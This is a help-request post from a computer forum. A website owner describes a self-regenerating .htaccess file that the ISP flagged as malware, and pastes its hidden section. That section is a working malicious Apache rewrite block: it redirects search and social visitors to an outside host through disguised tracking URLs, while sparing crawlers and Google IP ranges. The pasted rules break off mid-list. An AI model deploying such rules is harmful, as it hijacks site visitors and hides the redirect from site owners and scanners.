Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Cannot delete malicious .htaccess file


  • Please log in to reply
1 reply to this topic

#1 247earnings

247earnings

  • Members
  • 1 posts
  • OFFLINE
  •  
  • Local time:07:50 PM

Posted 25 March 2018 - 03:30 PM

I have a perplexing problem.  My ISP ran a scan of my account and identified one file in my root directory as being malware.  They deactivated 11 of my sites to prevent further contamination to the server.  The file is an .htaccess file that appears to be the deactivation instructions of my ISP (They deny creating it).  However, about 900 blank lines down from the .htaccess instructions were over 1,000 lines of additional code.  I believe this code is malicious and causing the "malware alert" problem.

 

I tried to delete the .htaccess file as instructed by my ISP.  It immediately regenerated. 

I tried to edit the file to delete the instructions.  Editing of the file was denied. 

I changed the file permissions to 777 to allow me to have complete edit capability.  However, I was still denied. 

 

I contacted my ISP and they assured me it was not "their" .htaccess file.  They said they did not deactivate accounts via an .htaccess file.  They said it was malware causing the problem.  They even tried to delete/modify the file but were unable to do so.  They tried everything that I did from the server side but to no avail. 

 

I am totally exasperated.  They told me I had to find a security developer to clear the malware.  The cost to try and fix this problem (delete this one file) runs anywhere from $87.00 - $199.95.  I am asking the community for help. 

 

Here is the complete .htaccess file.  I have deleted the 900 blank lines for brevity of posting.  If anyone has any ideas, I sure would be grateful.  I added the dotted lines for clarification.

 

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   

# <deactivate www.247marketinggroup.com>
# Reason for deactivation: deactivate%20flag
# Please contact us to remedy this situation as soon as possible
# </deactivate>
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
900 lines down the following script was found:
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
<IfModule prefork.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(tweet|twit|linkedin|instagram|facebook\.|myspace\.|bebo\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(hi5\.|blogspot\.|friendfeed\.|friendster\.|google\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(lycos\.|metacrawler\.|mail\.|pinterest|instagram).*$   [NC]
RewriteCond %{HTTP_REFERER}     !^.*(imgres).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|bleep\sYou|Google).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|IRIX|Jakarta|JetBrains).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|macDN|Mediapartners|Megite|MetaProducts).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
RewriteCond %{REMOTE_ADDR}      !^66\.249.*$ [NC]
RewriteCond %{REMOTE_ADDR}      !^74\.125.*$ [NC]
RewriteCond %{HTTP_COOKIE}      !^.*bFP.*$ [NC]
RewriteCond %{HTTP_USER_AGENT}  .*(Windows|Macintosh|iPad|iPhone|iPod|Android).* [NC]
RewriteCond %{HTTPS}            ^off$
RewriteRule .* - [E=bFP:%{TIME_SEC}]
RewriteRule .* - [E=mBZ:ugustus.bristolblog.com]
 
RewriteCond %{ENV:bFP} 0
RewriteRule ^.* http://%{ENV:mBZ}/t.gif?_=1340684907394&count=none&id=twitter-widget-0&lang=en&original_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&related=kaskus:Official\%20Kaskus\%20Account&size=m&text=\%5BJ-Music\%5D\%5BIDOL\%5D\%5BHello!Project\%5D\%20S/mileage\%20\%E3\%82\%B9\%E3\%83\%9E\%E3\%82\%A4\%E3\%83\%AC\%E3\%83\%BC\%E3\%82\%B8\%20FANS\%20-\%20http\\%3A\\%2F\\%2Fkask.us/7434479\%20\%23kaskus&url=none&type=share&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=1&twttr_hask=1&twttr_li=0&twttr_pid=v3:1340676210490101614564553  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11663:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 1
RewriteRule ^.* http://%{ENV:mBZ}/dcs0junic89k7m2gzez6wz0k8_7v8n/dcs.gif?&dcsdat=1341563984319&dcssip=office.microsoft.com&dcsuri=/en-us/images/results.aspx&dcsqry=?qu=business\%2520finance\%26ctt=1&dcsref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&WT.tz=7&WT.ti=Search\%20results\%20for\%20business\%20finance\%20-\%20Images\%20and\%20More\%20-\%20Office.com&WT.le=UTF-8&WT.dl=0&WT.ssl=0&WT.es=office.microsoft.com/en-us/images/results.aspx&WT.cg_n=images&WT.z_css=business\%20finance&WT.dcsvid=78d34d2d90963a43998e579cd229c902&WT.z_MUID=2719E8F1F1D16D2116BCEB64F5D16DFA\%26TUID\%3D1&WT.vt_f_tlh=1341563984&WT.vtvs=1341563903678&WT.vtid=2c67220b76d4e7141c11296756165557&WT.co_f=2c67220b76d4e7141c11296756165557&oo_source=Web&oo_orig_appver=ZPP120&oo_ul=en-US&oo_offver=Other&oo_assetid=EC079000012&oo_market=en-US&oo_bc=images&oo_clicktype=1&oo_hash=mt:2\%7C&WT.z_rviewTrig=1&WT.z_tbb=0&WT.z_searchid=c339655f-522e-47b3-beda-e58b0b1637ed&WT.z_filter_evt=1&WT.z_OriginSubweb=Images\%20and\%20More&WT.z_OriginAssetID=EC079000012&WT.z_PageNumber=4&WT.z_PerPage=25&WT.z_Position=76:77:78:79:80:81:82:83:84:85:86:87:88:89:90:91:92:93:94:95:96:97:98:99:100:&WT.z_SearchAssetID=MP900285084:MP900427941:MP900444146:MP900341936:MP900442307:MP900442965:MP900448379:MP900442969:MP900443263:MP900442414:MP900442294:MP900442178:MP900442513:MP900442214:MP900341889:MP900315594:MP900399487:MP900422401:MP900305913:MP900305912:MP900427657:MP900399495:MP900398759:MP900308987:MP900341968:&wtEvtSrc=office.microsoft.com/en-us/images/results.aspx  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11655:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 2
RewriteRule ^.* http://%{ENV:mBZ}/b?c1=2&c2=6036211&rn=0.39846566036461484&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c3=&c4=&c5=&c6=&c10=&c15=&c16=&c8=&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cv=1.7  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11524:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 3
RewriteRule ^.* http://%{ENV:mBZ}/s?referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&volume=100&sd=B6F5EF807HH1341227667509892&feature=related&et=3.036&hbd=4301815&el=detailpage&fexp=920704,921602,901700,913542,907335,922600,919306,924700,914030,907344,907217,920706,924500,902518,919324,906043,919316,912706&vtmp=1&hbt=93.915&sendtmp=1&csipt=watch5&hasstoryboard=1&plid=AATD1uag0Iw35kji&nbe=1&ptk=youtube_none&tpmt=2&w=480&cr=ID&h=360&rt=26.339&vid=Dt7x356SANpp6pHxvDgx0IBCzt9RNQE4C&fmt=34&cfps=0&hl=en_US&sdetail=f:related\%2Crv:MUojevLL1pY&bc=283761&bd=217443&screenh=768&playerw=640&bt=19.945&playerh=390&ns=yt&scoville=1&docid=KLU-qbgFSSs&len=45.746&screenw=1024&sourceid=yw&md=1&pd=1.171&lact=15744&vq=auto&fbe=1&fs=0&st=0&mos=0  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9463:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 4
RewriteRule ^.* http://%{ENV:mBZ}/g.gif?host=kudalumpingmakanpager.wordpress.com&rand=0.025170490276088198&blog=4215369&v=wpcom&user_id=0&subd=kudalumpingmakanpager&ref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11345:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 5
RewriteRule ^.* http://%{ENV:mBZ}/t.gif?_=1341544947081&count=vertical&id=twitter-widget-0&lang=en&original_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&size=m&text=terselubung:\%2012\%20Kaum\%20yang\%20Dibinasakan\%20Allah&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&via=terselubung&type=share&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=1&twttr_hask=0&twttr_li=0&twttr_pid=v3:1341544705461413794944964  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11579:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 6
RewriteRule ^.* http://%{ENV:mBZ}/t/image.gif?sid=d3a1663bf4499c77cc78957914adba25&vid=d3a1663bf4499c77cc78957914adba25&sik=&t=7cc61325b9a8d31403b7ad77d172579bf4c00b1a000001384544fbd8&w=1&i=56998511-1463-4800-a36c-ac326ada099c&aik=164188662&ri=31c785b9-28c7-4842-8ddf-0420b50fea89&ark=3562182&uid=77016168&apk=1692098&pnk=14&gk=&pt=1&rv=36&rpv=0&iv=2&udd=false&dd=&it=0&sq=0&ts=1341211483620&CXNID=2000003.0000000001NXC&l=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cs=\%7Bt:\%221341211482870\%22\%7D&et=G  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11539:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 7
RewriteRule ^.* http://%{ENV:mBZ}/delivery/lg.php?bannerid=36517&campaignid=7494&zoneid=562&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=2f93aa4273  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:10564:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 8
RewriteRule ^.* http://%{ENV:mBZ}/1pix.gif?dcsdat=1340349884843&dcssip=&os=Windows\%20XP&lang=en&flashVer=WIN\%2010\%2C1\%2C102\%2C64&dcsref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&playerURL=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&videoId=1216096166001&dcsuri=/viewer/video_view&sourceId=89804535001&publisherId=89804535001&affiliateId=&playerId=1522730664001&lineupId=1521712908001&playerTag=  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11947:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 9
RewriteRule ^.* http://%{ENV:mBZ}/b?c1=8&c2=6135404&c3=28&c4=13310&c10=3197034&ns__t=1341637388555&ns_c=ISO-8859-1&c8=&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11709:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 10
RewriteRule ^.* http://%{ENV:mBZ}/delivery/lg.php?bannerid=36709&campaignid=7505&zoneid=1656&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=437c0de007  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11711:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 11
RewriteRule ^.* http://%{ENV:mBZ}/vrelease/j712062603/j7.php?/MComd/&11=&signed_request=Bz7axhF_UXRaOUdUSAy6DWltD7ZFlmNgNPIdUiLIguU.eyJhbGdvcml0aG0iOiJITUFDLVNIQTI1NiIsImV4cGlyZXMiOjEzNDA3MTU2MDAsImlzc3VlZF9hdCI6MTM0MDcwOTcwNiwib2F1dGhfdG9rZW4iOiJBQUFDd0JQOHE5RFlCQURaQzFqc1ZQUndsN2lzelBrZGhFOGY3MENHeVpCYjRJOGw0akNNWGQ1WFMwWW5Hck0wU1FtdDlHOG4xeXFRWkJKS3Fsb0k1U2FxcU1NQ1RUaVpDbUs3V09MNVF3enl5SmRSZFdBcG0iLCJ1c2VyIjp7ImNvdW50cnkiOiJpZCIsImxvY2FsZSI6ImVuX1VTIiwiYWdlIjp7Im1pbiI6MTgsIm1heCI6MjB9fSwidXNlcl9pZCI6IjE3NzY5NjAzNDkifQ&access_token=AAACwBP8q9DYBADZC1jsVPRwl7iszPkdhE8f70CGyZBb4I8l4jCMXd5XS0YnGrM0SQmt9G8n1yqQZBJKqloI5SaqqMMCTTiZCmK7WOL5QwzyyJdRdWApm&dataurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&canvasname=flowershopfun&isnew=0&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&token=token_4fe99b909996e&uId=1776960349&cdnurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&/index/index/=  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:10243:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 12
RewriteRule ^.* http://%{ENV:mBZ}/b?c1=2&c2=6035118&rn=0.6222928070151557&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c3=&c4=&c5=&c6=&c10=&c15=&c16=&c8=Season\%208\%20-\%20Arena\%20Junkies\%20Forums&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cv=1.7  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9112:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 13
RewriteRule ^.* http://%{ENV:mBZ}/__utm.gif?utmwv=5.3.2&utms=1&utmn=1764539422&utmhn=wolipop.detik.com&utmcs=ISO-8859-1&utmsr=1024x768&utmvp=1008x640&utmsc=32-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=wolipop.com&utmhid=2057085728&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/\%3F993301lifestyle&utmac=UA-891770-46&utmcc=__utma\%3D1.2057668328.1329788352.1338792205.1340690233.8\%3B\%2B__utmz\%3D1.1340690233.8.8.utmcsr\%3Ddetik.com\%7Cutmccn\%3D(referral)\%7Cutmcmd\%3Dreferral\%7Cutmcct\%3D/\%3B&utmu=qhAAAAAg~  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:10133:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 14
RewriteRule ^.* http://%{ENV:mBZ}/__utm.gif?utmwv=5.3.2&utms=18&utmn=1188131309&utmhn=siva-id.jobstreet.com&utmcs=UTF-8&utmsr=1024x768&utmvp=1007x615&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.0\%20r22&utmdt=SiVA\%20\%C2\%A9JobStreet.com&utmhid=1729579412&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/applications/viewJobFolder.asp\%3FSearchMode\%3DFalse\%26ASC\%3D100000\%26QID\%3D065999223609053226\%257C7725165\%26QID2\%3D\%26Sort\%3D-133\%2C131\%2C105\%26SRC\%3D\%26SubF\%3D\%26PF\%3DFalse\%26JGID\%3D0\%26Spe\%3D134\%26Disct\%3DTrue\%26LocSrc\%3DFalse\%26Sought\%3D\%26HtmlKW\%3D\%26pcid\%3D\%26Role\%3D\%26SavedCriteria\%3D\%26JID\%3D897460289714148819\%257C523307\%26Rank\%3D0&utmac=UA-226014-6&utmcc=__utma\%3D1.698288290.1334714014.1340348039.1340584166.86\%3B\%2B__utmz\%3D1.1340348039.85.16.utmcsr\%3Dsiva-id.jobstreet.com\%7Cutmccn\%3D(referral)\%7Cutmcmd\%3Dreferral\%7Cutmcct\%3D/welcome/welcome.asp\%3B&utmu=qh~  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11685:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 15
RewriteRule ^.* http://%{ENV:mBZ}/neo/darla/php/fc.php?trace=compose_new&tID=55&d=0&f=978532077&l=MNW&rn=1341544899754&en=utf-8&mb_s_en=utf-8&filter=no_expandable\%253Bajax_cert_expandable\%253Bexp_iframe_expandable\%253B&ref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sa=content\%253D\%2522minty_tenure\%253A\%2520week\%25203+\%2522&  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9411:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 16
RewriteRule ^.* http://%{ENV:mBZ}/b?c1=2&c2=8443234&ns__t=1341255088819&ns_c=ISO-8859-1&c8=detik\%20Finance\%20:\%20Barometer\%20Bisnis\%20Anda&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9835:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 17
RewriteRule ^.* http://%{ENV:mBZ}/new2/www/delivery/lg.php?bannerid=10051&campaignid=3141&zoneid=20&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=ed3af7684f  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11352:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 18
RewriteRule ^.* http://%{ENV:mBZ}/st?_PVID=GWeQJGoKp3FYFQuQT4JF0gDDyokXaE_38m8AB.0T&cnt=yan&ad_type=iframe&ad_size=120x600&entity=24276&site_code=mail&section_code=15167778&cb=1341649519593060&yud=zip\%3D\%26ycg\%3Df\%26yyob\%3D1980&pub_redirect_unencoded=1&pub_redirect=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9589:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 19
RewriteRule ^.* http://%{ENV:mBZ}/__utm.gif?utmwv=5.3.2&utms=1&utmn=1263138273&utmhn=food.detik.com&utmcs=ISO-8859-1&utmsr=768x1024&utmvp=980x644&utmsc=32-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=detikFood:\%20Inilah\%2040\%20Makanan\%20Terenak\%20di\%20Indonesia!&utmhid=687041844&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/read/2011/08/18/125254/1705897/294/inilah-40-makanan-terenak-di-indonesia  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9614:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 20
RewriteRule ^.* http://%{ENV:mBZ}/servlet/ajrotator/125626/0/vj?z=adstars&ch=81116&dim=78535&pos=1&kw=Bisa\%2CBedakan\%2CAyam\%2CLepaas\%2Cdan\%2CAyam\%2CTangkap\%3F\%2C-\%2CKOMPAS.com\%2Cjakarta\%2Cayam\%20tangkap\%2Cayam\%20lepaas&pv=1154274028221161&nc=8704138&tz=420&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:10480:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 21
RewriteRule ^.* http://%{ENV:mBZ}/b/ss/godolavanguardia/1/H.19.3/s34707490319237?AQB=1&ndh=1&t=26/0/2010\%2010:57:51\%202\%20-60&ce=ISO-8859-1&ns=grupogod&g=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&r=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cc=EUR&ch=HagoClic&events=event2&h2=HagoClic.Enlacesdeldia&c4=HagoClic.Enlacesdeldia&s=1024x600&c=32&j=1.5&v=Y&k=Y&bw=1003&bh=440&ct=lan&hp=N&AQE=1  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11921:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 22
RewriteRule ^.* http://%{ENV:mBZ}/delivery/lg.php?bannerid=4275&campaignid=2451&zoneid=767&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=16944f1483  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11494:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 23
RewriteRule ^.* http://%{ENV:mBZ}/t.gif?_=1341813791094&count=horizontal&counturl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&id=twitter_tweet_button_0&lang=id&original_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&text=Tom\%20Cruise\%20Hobi\%20Pakai\%20G-String\%20Saat\%20Remaja\%20-\%20Yahoo!\%20OMG!\%20Indonesia&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&type=share&size=m&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=1&twttr_hask=0&twttr_li=0&twttr_pid=v3:1337819184838534984160665  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9579:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 24
RewriteRule ^.* http://%{ENV:mBZ}/new2/www/delivery/lg.php?bannerid=7763&campaignid=2423&zoneid=2&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=873ef7e8ee  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9095:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 25
RewriteRule ^.* http://%{ENV:mBZ}/neo/darla/php/fc.php?trace=folder_sent&tID=1&d=0&f=978500095&l=SKY\%2CREC\%2CMNW&rn=1341905562484&en=utf-8&filter=no_expandable\%253Bajax_cert_expandable\%253Bexp_iframe_expandable\%253B&ref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sa=content\%253D\%2522minty_tenure\%253A\%2520week\%25203+\%2522&  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9651:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 26
RewriteRule ^.* http://%{ENV:mBZ}/dis/dis.aspx?p=3585&t1=transaction&p1=v\%3D2\%26s\%3D0\%26wi\%3D7714897\%26i1\%3D\%26p1\%3D0\%26q1\%3D1&cb=5721404347&ref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sc_r=1024x768&sc_d=24  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:9523:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 27
RewriteRule ^.* http://%{ENV:mBZ}/pixel.gif?source=smarttag&fired=report&confid=Hi0kJsuv&geo_country=ID&geo_city=JAKARTA&_kpid=44c1a380-770f-11df-93f2-0800200c9a66&_kcp_s=Gaming&_kcp_d=wikia.com&_knifr=16&_kpref_=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&rtsegs=mc3n9p17i&_kpa_lang=en&_kpa_wpage=Characters&_kpa_cat=Characters&_kpa_keywords=Grand\%20Chase\%20Wiki\%2Cgrandchase\%2CCharacters\%2CElesis\%2CLire\%2CArme\%2CRin\%2CRonan\%2CLass\%2CRyan\%2CAmy\%2CJin\%2CSieghart&sview=2&kplt0=10952&tag10952_timing=\%7B\%22name\%22:\%22Krux\%20eXelate\%20Cookie\%20Match\%22\%2C\%22mode\%22:\%22async\%22\%2C\%22start\%22:23\%2C\%22end\%22:29\%2C\%22duration\%22:6\%7D&kplt1=10304&tag10304_timing=\%7B\%22name\%22:\%22Krux\%20Load\%20Segments\%22\%2C\%22mode\%22:\%22async\%22\%2C\%22start\%22:58\%2C\%22end\%22:73\%2C\%22duration\%22:15\%7D&kplt2=10854&tag10854_timing=\%7B\%22name\%22:\%22Krux\%20Attribute\%20Scraper\%22\%2C\%22mode\%22:\%22async\%22\%2C\%22start\%22:73\%2C\%22end\%22:174\%2C\%22duration\%22:101\%7D&kplt3=12260&tag12260_timing=\%7B\%22name\%22:\%22Kyle\%20-\%20Magnetic\%22\%2C\%22mode\%22:\%22async\%22\%2C\%22start\%22:175\%2C\%22end\%22:184\%2C\%22duration\%22:9\%7D&kplt4=10491&tag10491_timing=\%7B\%22name\%22:\%22VisualDNA\%22\%2C\%22mode\%22:\%22async\%22\%2C\%22start\%22:184\%2C\%22end\%22:190\%2C\%22duration\%22:6\%7D&kplt5=10600&tag10600_timing=\%7B\%22name\%22:\%22BlueKai\%22\%2C\%22mode\%22:\%22async\%22\%2C\%22start\%22:191\%2C\%22end\%22:197\%2C\%22duration\%22:6\%7D&kplt6=10632&tag10632_timing=\%7B\%22name\%22:\%22eXelate\%20Media\%22\%2C\%22mode\%22:\%22async\%22\%2C\%22start\%22:197\%2C\%22end\%22:1173\%2C\%22duration\%22:976\%7D&jsonp_requests=  [R=302,NE,L,CO=bFP:%{ENV:bFP}:%{HTTP_HOST}:11916:/:0:HttpOnly]
RewriteCond %{ENV:bFP} 28
